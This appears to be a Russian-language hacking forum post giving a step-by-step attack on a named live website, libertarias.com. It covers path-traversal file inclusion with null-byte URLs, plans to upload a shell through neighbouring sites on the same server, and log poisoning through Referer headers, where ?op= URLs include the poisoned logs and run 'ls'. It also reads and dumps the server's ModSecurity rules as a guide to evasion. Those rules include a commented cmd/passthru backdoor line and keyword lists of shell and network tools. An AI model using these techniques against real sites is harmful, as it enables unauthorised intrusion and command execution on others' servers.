|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от ta-kyn
=). Благодарю. А почему ..../../etc
//
passwd%00... ?
Вывод /etc/passwd - это хорошо, но выполнение своего кода лучше.
1) Заливка шелла через соседей.
Через реверс-DNS находим 35 сайтов, расположенных на том же сервере, что и libertarias.com.
На одном из сайтов (ud-garithos.com) стоит phpBB 3.0.7 , в этой версии есть раскрытие путей, а шелл можно залить в картинке через аттач. К сожалению, версия оказалась пропатченная и путь узнать не удалось.
2) Внедрение кода в логи.
На сайте хостера (http://wiki.dreamhost.com/Finding_Causes_of_Heavy_Usage) узнаем, что логи хранятся в ~/logs/yourdomain.com/http/
Для внедрения кода в error.log выполняем запрос:
PHP код:
[COLOR="#000000"]GET /qwertyuiop HTTP/1.0
Host: www.libertarias.com
Referer: [COLOR="#0000BB"][/COLOR][/COLOR]
В access.log:
PHP код:
[COLOR="#000000"]GET / HTTP/1.0
Host: www.libertarias.com
Referer: [COLOR="#0000BB"][/COLOR][/COLOR]
Примеры:
PHP код:
[COLOR="#000000"]GET /qwertyuiop HTTP/1.0
Host: www.libertarias.com
Referer: [COLOR="#0000BB"][/COLOR][/COLOR]
Код:
http://www.libertarias.com/?op=../../../../home/libertarias/logs/libertarias.com/http/error.log%00&qwe=ls
PHP код:
[COLOR="#000000"]GET / HTTP/1.0
Host: www.libertarias.com
Referer: [COLOR="#0000BB"][/COLOR][/COLOR]
Код:
http://www.libertarias.com/?op=../../../../home/libertarias/logs/libertarias.com/http/access.log%00&qwe=ls
p.s.: не забывай про Mod Security
Код:
http://www.libertarias.com/?op=../../../../dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf%00&
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]#Body sigs
[/COLOR][COLOR="#0000BB"]SecRule REQUEST_HEADERS_NAMES[/COLOR][COLOR="#DD0000"]"x_(?:key|file)\b"[/COLOR][COLOR="#007700"]\
[/COLOR][COLOR="#DD0000"]"capture,phase:2,t:none,t:lowercase,status:404,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Backdoor access',id:390146,severity:'2',logdata:'%{TX.0}'"
[/COLOR][COLOR="#FF8000"]#c99 rootshell
[/COLOR][COLOR="#0000BB"]SecRule REQUEST_URI[/COLOR][COLOR="#DD0000"]"(?:\.php\?act=(chmod&f|cmd|ls|f&f)|cx529\.php|\.php\?(?:phpinfo|mtnf|p0k3r)|/shell[0-9]?\.php|/\.get\.php)"[/COLOR][COLOR="#007700"]\
[/COLOR][COLOR="#DD0000"]"capture,id:390146,rev:17,severity:2,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Command shell attack: PHP exploit shell attempting to run command',logdata:'%{TX.0}'"
[/COLOR][COLOR="#FF8000"]#URI sigs
[/COLOR][COLOR="#0000BB"]SecRule REQUEST_URI[/COLOR][COLOR="#DD0000"]"/(?:(?:cse|cmd)\.(?:c|dat|gif|jpe?g|png|sh|txt|bmp|dat|txt|js|tmp|php(?:3|4|5)?|asp)|(?:terminatorX-?exp|[a-z](?:cmd|command)[0-9]?)\.(?:gif|jpe?g|txt|bmp|php(?:3|4|5)?|png)\?|cmd(?:\.php(?:3|4|5)?|dat)|/(?:a|ijoo|oinc|s|sep|ipn|pro18|(php(?:3|4|5)?)?|shell|(?:o|0|p)wn(?:e|3)d|xpl|ssh2|too20|php(?:3|4|5)?backdoor|dblib|sfdg2)\.(?:c|dat|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|htm|html|tmp|php(?:3|4|5)?|asp)\?&(?:command|cmd)=|\.it/viewde|/(?:gif|jpe?g|ion|lala|shell|/ipn|php(?:3|4|5)?shell)\.(?:php?(?:3|4|5)?|tml)|tool[12][0-9]?\.(?:ph(?:p(?:3|4|5)?|tml)|js)\?|therules25?\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?|\.dump/(bash|httpd)\.(?:txt|php?(?:3|4|5)?|gif|jpe?g|dat|bmp|png|\;| )|suntzu\.php?(?:3|4|5)?\?cmd|proxysx\.(?:gif|jpe?g|bmp|txt|asp|png)\?|shell.txt|scan1\.0/scan/|(?:/bind|/juax|linuxdaybot)\.(gif|jpe?g|txt|bmp|png)|docLib/cmd\.asp)"[/COLOR][COLOR="#007700"]\
[/COLOR][COLOR="#DD0000"]"capture,id:390800,rev:3,severity:2,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Possible Rootkit attack: Generic Attempt to run rootkit',logdata:'%{TX.0}'"
[/COLOR][COLOR="#FF8000"]#generic payload
#if (isset($_GET['cmd'])) passthru(stripslashes($_GET['cmd']));
[/COLOR][COLOR="#0000BB"]SecRule REQUEST_URI[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]ARGS[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]REQUEST_BODY[/COLOR][COLOR="#DD0000"]"(?:rapidleech checker script|rapidleech plugmod - auto download|rapidleech|You are not allowed to leech from|alt=\"rapidleech plugmod|.*rapidleech|src=\"http://www\.rapidleech\.com/logo\.gif)"[/COLOR][COLOR="#007700"]\
[/COLOR][COLOR="#DD0000"]"phase:4,t:lowercase,ctl:auditLogParts=+E,auditlog,status:404,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Unauthorized Download Client - Rapidleech',id:'390900',rev:8,severity:'2'"
[/COLOR][COLOR="#0000BB"]SecRule RESPONSE_HEADERS[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]WWW[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Authenticate[/COLOR][COLOR="#DD0000"]"basic realm.*rapidleech"[/COLOR][COLOR="#007700"]\
[/COLOR][COLOR="#DD0000"]"capture,phase:3,ctl:auditLogParts=+E,auditlog,status:404,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Unauthorized Download Client - Rapidleech',id:'390903',rev:1,severity:'2',logdata:'%{TX.0}'"
[/COLOR][COLOR="#FF8000"]#WWW-Authenticate: Basic realm=\"RAPIDLEECH PLUGMOD
[/COLOR][COLOR="#0000BB"]SecRule ARGS[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]cmd[/COLOR][COLOR="#DD0000"]"(?:ls -|find /|mysqldump |ifconfig |php |echo |perl |killall |kill |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |wget |lwp-(?:download|request|mirror|rget) |uname |cvs |svn |(?:s|r)(?:cp|sh) |net(?:stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |g?cc |cpp |g\+\+ |/s?bin/(?:xterm|id|bash|sh|echo|kill|chmod|ch?sh|python|perl|nasm|ping|mail|ssh|netstat|php|route))"[/COLOR][COLOR="#007700"]\
[/COLOR][COLOR="#DD0000"]"capture,id:390904,rev:4,severity:2,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Possible PHP Shell Command Attempt',logdata:'%{TX.0}'"
[/COLOR][COLOR="#0000BB"]SecRule ARGS[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]ev[/COLOR][COLOR="#DD0000"]"^print [0-9];"[/COLOR][COLOR="#007700"]\
[/COLOR][COLOR="#DD0000"]"capture,id:390905,rev:1,severity:2,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Possible PHP Shell Command Attempt',logdata:'%{TX.0}'"
[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#0000BB"]SecRuleRemoveById 390144
SecRuleRemoveById 390145
[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#0000BB"]SecRuleRemoveById 390148
[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#0000BB"]SecRuleRemoveById 390149
[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#0000BB"]SecRuleRemoveById 390144
[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#0000BB"]SecRuleRemoveById 390149
[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#0000BB"]SecRuleRemoveById 390149
[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#0000BB"]SecRuleRemoveById 390149
[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#0000BB"]SecRuleRemoveById 390149
[/COLOR][COLOR="#007700"]
SecRuleRemoveById 390147
SecRuleRemoveById 390149
SecRuleRemoveById 390147
SecRuleRemoveById 390149
SecRuleRemoveById 390149
SecRuleRemoveById 390149
SecRuleRemoveById 390149
SecRuleRemoveById 390147
SecRuleRemoveById 390149
SecRuleRemoveById 390149
SecRuleRemoveById 390149
SecRuleRemoveById 390149
SecRuleRemoveById 390149
SecRuleRemoveById 390148
SecRuleRemoveById 390801
SecRuleRemoveById 390148
SecRuleRemoveById 390145
SecRuleRemoveById 390902
[/COLOR][/COLOR]
|